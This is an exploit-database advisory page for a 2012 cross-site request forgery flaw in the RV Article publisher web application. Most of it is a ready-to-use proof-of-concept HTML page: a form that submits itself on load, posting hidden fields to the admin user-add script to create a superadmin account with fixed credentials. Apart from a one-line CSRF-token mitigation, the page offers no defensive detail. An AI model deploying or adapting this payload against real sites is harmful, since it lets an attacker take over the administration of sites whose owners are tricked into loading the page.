RV Article publisher CSRF Vulnerability

vendor:

RV Article publisher

by:

DaOne

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: RV Article publisher

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

RV Article publisher CSRF Vulnerability

This exploit allows an attacker to add an admin user to the RV Article publisher application. The attacker can craft a malicious HTML page that contains a form with hidden fields that contain the username, email, password, group, active, superadmin, postnote, and save_user values. When the victim visits the malicious page, the form is automatically submitted and the admin user is added to the application.

Mitigation:

The application should implement CSRF protection tokens to verify that the request is coming from a trusted source.

Source

Exploit-DB raw data:

# Exploit Title: RV Article publisher CSRF Vulnerability
# Date: 26/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.scripts4webmasters.com
# Greetings to LCA


# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php">
<input type="hidden" name="user_id" value=""/>
<input type="hidden" name="username" value="webadmin">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="group[]" value="1"/>
<input type="hidden" name="active" value="1"/>
<input type="hidden" name="superadmin" value="1"/>
<input type="hidden" name="postnote" value=""/>
<input type="hidden" name="save_user" value="Save"/>
</form>
</body>
</html>